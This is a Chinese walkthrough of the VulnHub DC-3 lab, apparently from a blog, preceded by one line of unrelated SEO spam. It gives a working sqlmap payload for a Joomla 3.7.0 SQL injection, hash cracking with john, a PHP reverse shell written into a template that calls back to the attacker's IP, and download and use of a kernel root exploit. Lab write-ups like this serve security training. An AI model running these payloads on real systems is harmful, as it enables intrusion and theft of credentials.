上海工业网站建设,百姓网app官方最新下载,青岛地产网站建设,济南seo推广效果好DC-3
DC-3靶场链接#xff1a;https://download.vulnhub.com/dc/DC-3-2.zip
下载后解压会有一个DC-3.ova文件#xff0c;直接在vm虚拟机点击左上角打开--文件--.选中这个.ova文件就能创建靶场#xff0c;kali和靶机都调整至NAT模式
首先进行主机发现#xff1a; arp…DC-3
DC-3靶场链接https://download.vulnhub.com/dc/DC-3-2.zip
下载后解压会有一个DC-3.ova文件直接在vm虚拟机点击左上角打开--文件--.选中这个.ova文件就能创建靶场kali和靶机都调整至NAT模式
首先进行主机发现 arp-scan -l 扫出靶机ip是192.168.183.146
Nmap扫描 nmap -A -p- 192.168.183.146 发现这台机只开了80端口访问80端口发现一个登录的常规的burpsuite抓包爆破找到密码snoopy但是成功登录也没什么变化 用dirsearch扫目录 dirsearch -u 192.168.183.146 -e * -i 200 打开http://192.168.183.146/administrator/ 在这个登录框输入账号admin密码snoopy即可登录到后台
另一种登录后台的方法
回到nmap Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 15:58 CST Nmap scan report for 192.168.183.146 Host is up (0.00022s latency). Not shown: 65534 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-title: Home |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds 注意到这是Joomla的cms针对joomala可以使用joomscan
joomscan是一款开源的且针对joomla的扫描器kali可以用命令apt install joomscan安装该工具利用joomscan进行joomla信息探测 joomscan -u 192.168.20.140 得到这是Joomla 3.7.0版本可以使用searchsploit搜索这个版本joomla的漏洞 searchsploit Joomla 3.7.0 searchsploit是一款kali自带的搜索漏洞信息的模块
参数参考 -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact [Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies -t]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path [EDB-ID] 显示漏洞利用的完整路径如果可能还将路径复制到剪贴板后面跟漏洞ID号 -t, --title [Term] 仅仅搜索漏洞标题默认是标题和文件的路径 -u, --update 检查并安装任何exploitdb软件包更新deb或git -w, --www [Term] 显示Exploit-DB.com的URL而不是本地路径在线搜索 -x, --examine [EDB-ID] 使用$ PAGER检查副本Exp --colour 搜索结果不高亮显示关键词 --id 显示EDB-ID --nmap [file.xml] 使用服务版本检查Nmap XML输出中的所有结果例如nmap -sV -oX file.xml 使用“-v”详细来尝试更多的组合 --excludeterm 从结果中删除值。通过使用“|”分隔多个值 例如--exclude“term1 | term2 | term3” 从结果来看我们发现joomla 3.7.0有一个sql漏洞 ┌──(root㉿kali)-[/home/kali] └─# searchsploit joomla 3.7.0 ------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------- --------------------------------- Joomla! 3.7.0 - com_fields SQL Injection | php/webapps/42033.txt Joomla! Component Easydiscuss 4.0.21 - Cross-S | php/webapps/43488.txt ------------------------------------------------- --------------------------------- Shellcodes: No Results 把相关漏洞信息复制到桌面 touch /home/kali/桌面/42033.txt cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /home/kali/桌面/42033.txt 在桌面的42033.txt里给出了sqlmap的payload sqlmap -u http://192.168.183.146/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --batch --dbs sqlmap出了数据库 available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys 接下来依次破解表名、字段名即可这里放上最后payload sqlmap -u http://192.168.183.146/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] -D joomladb -T #__users -C username,password --dump 得到了admin账号及其被加密过的密码 Table: #__users [1 entry] ------------------------------------------------------------------------ | username | password | ------------------------------------------------------------------------ | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | ------------------------------------------------------------------------ 这里我们可以尝试用join对这串密文进行爆破
john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件支持目前大多数的加密算法如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS 主要目的是破解不够牢固的 Unix/Linux 系统密码。
在kali上安装join apt install john 在桌面创一个放密码的文件 touch /home/kali/桌面/pass.txt 把刚刚被加密的密码写入进去 vi /home/kali/桌面/pass.txt 打开后按i进入插入模式复制完后按ESC后输入“:wq”保存退出
开始使用join工具破解 john /home/kali/桌面/pass.txt 得到密码是snoopy
反弹shell
进入后台后点击左边栏上的Templates然后在点一次左边的Templates点击beez3进入到一个文件上传页面随机挑选一个文件把别的内容注释了然后写入 ?php system(bash -c bash -i /dev/tcp/192.168.183.138/666 01 );? Ip改成自己kali的ip点击保存在kali那边打开监听 nc -lvvp 666 然后物理机访问网页http://192.168.183.146/templates/beez3/刚刚写入反弹命令的文件名
回到kali看见反弹成功利用python获取交互式shell python -c import pty;pty.spawn(/bin/bash) Whoami后发现不是root权限需要提权
提权
信息收集
进行一些信息收集以下是linux系统信息收集 cat /etc/issue #查看系统名称 cat /proc/version #查看当前运行的 Linux 内核版本信息 cat /etc/Lsb-release #查看系统名称,版本号 cat /etc/*release #查看linux发行信息 uname -an #查看内核版本 cat /proc/cpuinfo #查看cpu信息 dpkg -l | grep linux-image #已安装的补丁信息 得知这是Ubuntu 16.04系统继续使用searchsploit查看版本漏洞 ──(kali㉿kali)-[~] └─$ searchsploit Ubuntu 16.04 --------------------- --------------------------------- Exploit Title | Path --------------------- --------------------------------- Apport 2.x (Ubuntu D | linux/local/40937.txt Exim 4 (Debian 8 / U | linux/local/40054.c Google Chrome (Fedor | linux/local/40943.txt LightDM (Ubuntu 16.0 | linux/local/41923.txt Linux Kernel (Debian | linux_x86-64/local/42275.c Linux Kernel (Debian | linux_x86/local/42276.c Linux Kernel (Ubuntu | linux/dos/39773.txt Linux Kernel 4.14.7 | linux/local/45175.c Linux Kernel 4.4 (Ub | linux/dos/46529.c Linux Kernel 4.4 (Ub | linux/local/40759.rb Linux Kernel 4.4.0 ( | linux_x86-64/local/40871.c Linux Kernel 4.4.0-2 | linux_x86-64/local/40049.c Linux Kernel 4.4.0-2 | windows_x86-64/local/47170.c Linux Kernel 4.4.x ( | linux/local/39772.txt Linux Kernel 4.6.2 ( | linux/local/40489.txt Linux Kernel 4.8 (Ub | linux/dos/45919.c Linux Kernel 4.13. | linux/local/45010.c Linux Kernel 4.4.0 | linux/local/43418.c Linux Kernel 4.4.0 | linux/local/44298.c Linux Kernel 4.4.0 | linux/local/47169.c Linux Kernel 4.4.0 | linux_x86-64/local/44300.c --------------------- --------------------------------- Shellcodes: No Results 然后查看39772.txt的路径 ┌──(kali㉿kali)-[~] └─$ searchsploit -p 39772.txt Exploit: Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() bpf(BPF_PROG_LOAD) Privilege Escalation URL: https://www.exploit-db.com/exploits/39772 Path: /usr/share/exploitdb/exploits/linux/local/39772.txt Codes: CVE-2016-4557, 823603 把该路径复制到桌面 cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/桌面/39772.txt 打开桌面上的39772.txt文件最后一行附上了exp链接 物理机访问网址下载exp解压后是一个叫39772的文件把文件拖进虚拟机桌面上
用python开启http服务 python -m http.server 8080 浏览器访问
http://192.168.183.138:8080/%E6%A1%8C%E9%9D%A2/39772/
其实就是在网页找到这个exp文件然后复制exploit.tar的链接回到虚拟终端用wget下载这个链接 wget http://192.168.183.138:8080/%E6%A1%8C%E9%9D%A2/39772/exploit.tar 出现了以下情况就是成功了 exploit.tar 100%[] 20.00K --.-KB/s 然后解压 tar -xvf exploit.tar 在39772.txt里有教怎么使用exp蓝色部分 先输入 ./compile.sh 后输入 ./doubleput 再次whoami就能发现提权到了rootflag就在/root下
